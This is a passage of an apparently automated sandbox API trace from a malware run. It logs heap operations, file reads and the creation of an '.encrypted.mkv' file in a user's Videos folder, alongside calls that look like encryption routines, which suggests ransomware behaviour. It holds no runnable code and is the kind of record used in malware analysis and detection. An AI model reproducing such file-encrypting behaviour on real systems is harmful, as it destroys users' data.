[0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0042.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0042.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0042.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0042.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0042.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0042.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0042.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.338] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl")) returned 0x10 [0042.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0042.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0042.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.338] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.encrypted.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\e- kodk.encrypted.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0042.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0042.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0042.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0042.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.339] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0042.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0042.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0042.339] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0042.339] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0042.339] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0042.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0042.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0042.340] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0042.340] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x1340, lpOverlapped=0x0) returned 1 [0042.341] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0042.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1340) returned 0x7c9968 [0042.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0042.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0042.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0042.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1340) returned 0xac2018 [0042.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9968 | out: hHeap=0x770000) returned 1 [0042.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.342] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0042.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1340) returned 0x7c9968 [0042.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9968 | out: hHeap=0x770000) returned 1 [0042.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0042.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.342] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0042.343] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.343] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0042.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1340) returned 0x7c9968 [0042.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0042.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0042.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0042.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd18 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1340) returned 0xac3360 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0042.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0042.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0042.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0042.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0042.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0042.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0042.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.351] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0042.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da358 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0042.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c910 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0042.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.351] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0042.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0042.352] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0042.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0042.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0042.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0042.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0042.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0042.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0042.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.353] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0042.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 